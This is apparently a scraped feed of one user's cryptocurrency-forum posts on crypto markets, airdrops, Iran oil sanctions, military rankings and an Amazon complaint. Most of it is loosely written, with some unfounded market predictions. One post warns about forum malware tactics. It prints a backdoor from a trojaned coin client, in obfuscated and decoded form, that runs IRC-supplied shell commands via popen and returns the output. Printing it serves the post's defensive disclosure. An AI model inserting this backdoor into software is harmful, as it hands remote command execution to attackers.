China's military is very strong, but it is hard to beat the US military, the United States is the world's largest force.
To your great regret, the United States in the number of Armed forces only in 3 place on 1 is China but the professionalism of the best army in the world recognized Russia because only Russia is the number of operations carried out in the world which have no analogues in the world.

Re: U.S tells China and India to stop buying oil from Iran

Washington may slap sanctions on governments that fail to reduce Iranian oil imports to "zero" by early November, a senior State Department official has warned. But some partners seem reluctant to follow the demand. The US administration has been pushing its allies to follow US President Donald Trump's lead after he decided to pull out of the landmark nuclear agreement between Iran and six world powers. A senior State Department official told reporters on Tuesday he had been traveling to Europe and Asia to convince allies to isolate the "stream of Iranian funding."

India and China traditionally used to get a waiver from sanctions and kept trading with Iran even before the 2015 agreement, so speculation is rife as to whether they will manage to find workarounds this time.The State Department acknowledges that cutting off Iranian oil imports completely is a “challenge” that no country “wants to do voluntarily”.

https://www.rt.com/news
The United States is not profitable for someone to buy oil that they want to sell their own as the Treasury needs money Donald trump is not a politician , and a businessman and he understands that it is profitable to sell oil to the East, you can get important allies of Russia.

Actually for the previous two months now the market has been bleeding, this is so because a bear is in charge. One ought to additionally be aware that earlier than now bull has been ruling the market, so is a herbal element in any market. It is currently not always a horrific omen to ride the downside in any market especially in the cryptocurrency market.
The cryptocurrency market as well as any other market is not stable, the fall and growth can cause anything from simple statements of politicians to natural disasters.

With the current market conditions going down to be the best opportunity to start, we must dare to invest now so that our future will get better as the year-end market will skyrocket.
I would not make such rosy forecasts because we need to live today and invest today and now. Since any political decision can change the course of cryptocurrency.

You can say what you like but markets go down when there is no confidence!
If it crashes big time the media will make cryptos look worse than they already have!
Such is life!

At any moment, the markets can go up and down so there is nothing wrong. You just need to understand that there is a risk, but the risk is always and everywhere.

Re: bitcoin in developing countries

at present, bitcoin is becoming known to people around the world, especially in developing countries. the majority of bitcoin is introduced through news on television and on the internet. Therefore people are starting to want to know what bitcoin is and if it appeals to them, they will invest instead?
Well the government should not be silent on bitcoin, they think bitcoin is disrupting economic stability and there will be inflation in the country.
Do you think that bitcoin will disrupt economic stability and there will be inflation due to bitcoin in a country?
Some countries have banned bitcoin because it can cause the government to lose most of its revenue.

Knowing that you could get free coins from Airdrops, would you exchange it once you got the coins or hold it until the vslue rises up?
It is best to exchange as it is now at a good price. It's like in business to sell at the peak of the rise otherwise you can lose. But who does not risk does not drink champagne.

Re: Chair breaks in 2 months. Sandals break in 2 minutes (Online Shopping)
by
Miha Kot
on 02/07/2018, 07:20:38 UTC
My 2 emails to amazon.com but no reply:

I am a buyer/customer at Amazon.com for past 4 years. Around 3 years back, I purchased sandals from amazon but the sandals (left and right) broke completely in 2 minutes after I started walking. I ignored it since it was Rs 350 sandals. In July 2017, I purchased Rs 850 sandals from amazon but after 6 months there were cracks on the sole. The original price for the sandals in some Rs 2000. So I sent a email to the seller saying "there should not be cracks in Rs 2000 sandals in 6 months but no reply from the seller. I am using the sandals hoping that they will work for 6 to 10 months more. I did not complain/write to amazon about these issues.

I have spoken to middle class people and I have seen the fear in them when they say "if I buy online I may get scammed or bad products and I will lose my money". If I am correct Amazon.in suffered $2 billion loss in year 2017. Now I have written to amazon.in regarding "I purchased and received a chair on April 02, 2018, from amazon seller "Eros General Agencies Pvt. Ltd" but the chair broke in 2 months from normal use when the warranty is for 3 months. I should get a new chair or refund without any question or delay. I spoke to the seller on phone 2 times but they are not accepting their mistake that it is "manufacturing defect".

It took some 6 days for the seller/Eros General Agencies to send the chair to my home. I have been ignoring my bad experiences with amazon.in sellers and I am giving 5 stars rating to amazon.com for past 2 years when I am on the internet. So I expect amazon.in to help me with this broken chair issue. This chair cost me close to Rs 1400.

I am also a internet poster. If I do not get a new chair or refund, I will have to post my bad experiences with products purchased from amazon.com. I cannot mislead people when some amazon seller says "the chair broke in 2 months. It is your fault, you have to spend money to repair the chair"
Not always the price matches the quality, so you should always be sure that the goods are of the best quality.

Some governments are starting to embrace blockchain and cryptocurrencies and others are literally closing the doors to this technology. Do you think governments will continue to fight back against cryptocurrencies and decentralization?

Yes, since some States are not ready to change and are ready to destroy progress and begin to degrade rather than accept something new.

Re: Beware of Increasingly Sophisticated Malware Infection Attempts
by
Miha Kot
on 30/06/2018, 11:50:41 UTC
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ?

Re: Bitcoin will be the replacement for gold?
by
Miha Kot
on 30/06/2018, 11:23:07 UTC
Speaking at the Sohn Investment Conference on Monday, April 23rd, John Pfeffer, serial entrepreneur, investor, and currently a partner at Pfeffer Capital, declared that Bitcoin is the first viable replacement for gold.

John Pfeffer said that his anticipation is for Bitcoin’s price to rise to at least $90,000 or even significantly higher.

Bitcoin is better than gold on every point

Pfeffer made a few bold statements, apart from his optimistic Bitcoin price prediction. He also noted that the grandfather of all cryptocurrency is “better than gold.” Decentralization, as well as censorship resistance, are the core pillars of Bitcoin’s prominence, according to Pfeffer. Also, he makes a case that the largest cryptocurrency is “vastly easier to store and transact with than gold.”

Pfeffer also noted that if 25% of the foreign gold reserves were to be replaced with bitcoins, the cryptocurrency network would receive a total value of $6.4 trillion.
While Pfeffer’s statements are undoubtedly brave, to say the least, he isn’t the first one to hint that Bitcoin could eventually replace gold. At the end of 2017, the famous Winklevoss twins were quite firm in their belief, saying that “Bitcoin matches or beats gold across the board.”

A key sentiment can be noticed in both Pfeffer’s statement and the one from the Winklevoss twins. They are obviously isolating Bitcoin from other cryptocurrencies, and they are clear that they shouldn’t be intermingled. At the conference, Pfeffer was quite blunt, saying that the “majority of crypto assets are bad bets.”

Rothscointeam

In the full probably really cryptocurrency can replace gold, but there is also the probability of fraud, in this case, security wins

I am very interested in this news if it is indeed true. Telegram has become one of the unofficial forums for all things crypto, much like BCT. They obviously could do a blockchain project and become very successful. However, the way this news is coming out seems strange.
Dear, most likely the project will not be, as the money was collected but the telegrams want to limit. But in principle, the film will find a way out, I think.

Well, some airdrops could be good but finding them is very very hard. Apparently everyone has their own strategy to get more profit, some of them is bad and some other good.. I think others experiences are also important.
Everyone has their own strategy, and few people want to share it. If everyone shared their secrets now the world would not be divided into rich and poor.

Re: Which is more effective Bounty or Airdrops ?
by

on 28/06/2018, 09:06:55 UTC
Then depending on what is meant by efficiency. If we talk about the bounty process may be more likely, but long. Airdrop is unique in its kind, you can get coins quickly but not much, and not the fact that you get.
